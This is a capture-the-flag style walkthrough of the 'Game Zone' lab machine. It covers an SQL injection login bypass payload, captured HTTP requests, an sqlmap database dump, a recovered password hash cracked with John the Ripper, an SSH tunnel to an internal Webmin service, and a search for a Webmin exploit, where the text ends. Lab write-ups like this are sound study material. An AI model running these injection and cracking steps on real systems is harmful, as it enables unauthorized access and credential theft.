Game Zone - HackMD

# Game Zone ###### tags: `vulnerableMachine` `linuxMachine` [TOC] ## Recon ![](https://i.imgur.com/S4g1m7a.png) ## login page (SQLI) ``` POST /index.php HTTP/1.1 Host: 10.10.16.37 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 35 Origin: http://10.10.16.37 Connection: close Referer: http://10.10.16.37/index.php Cookie: PHPSESSID=60n3p31cqtk77sasrt62fa5hd7 Upgrade-Insecure-Requests: 1 username=meow&password=meow&x=0&y=0 ``` login by pass username = ' or 1=1 -- - Vulnerable page ``` POST /portal.php HTTP/1.1 Host: 10.10.16.37 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 15 Origin: http://10.10.16.37 Connection: close Referer: http://10.10.16.37/portal.php Cookie: PHPSESSID=60n3p31cqtk77sasrt62fa5hd7 Upgrade-Insecure-Requests: 1 searchitem=meow ``` save this request content -> request.txt Goal: try to use SQLmap to retrieve the database Testing vulnerable parameter ![](https://i.imgur.com/QrdMYPn.png) ``` sqlmap -r request.txt --dbms=mysql --dump ``` Error-based injection ![](https://i.imgur.com/6BLexAU.png) ### Testing result of Sqlmap ![](https://i.imgur.com/e8KHBhc.png) Tables ->POST Table ![](https://i.imgur.com/jTgWpys.png) ->USER Table ![](https://i.imgur.com/qqrp7lP.png) ![](https://i.imgur.com/dg2y8Zi.png) User name: agent47 password hash: ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 ## John crack the hash password ``` john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256 ``` ![](https://i.imgur.com/krL1Zad.png) Catch the flag ![](https://i.imgur.com/EvmOJOt.png) ## Exposing the service with ssh tunnels [ssh tunnel](/a181FIrZSoK271Z5BFEJgw) >How many TCP sockets are running? netstat -ltp ![](https://i.imgur.com/ZoyEa2W.png) Port 10000 Create Revers ssh tunnel ``` ssh -N -L 4444:127.0.0.1:10000 agent47@10.10.16.37 ``` -N don't send any command Browser -> 127.0.0.1:4444 ![](https://i.imgur.com/TOMBwbf.png) ## Privilege elevation CMS: webmin target version: 1.580 search exploit ![](https://i.imgur.com/1xb6KkF.png) ![](https://i.imgur.com/Xap1BkQ.png)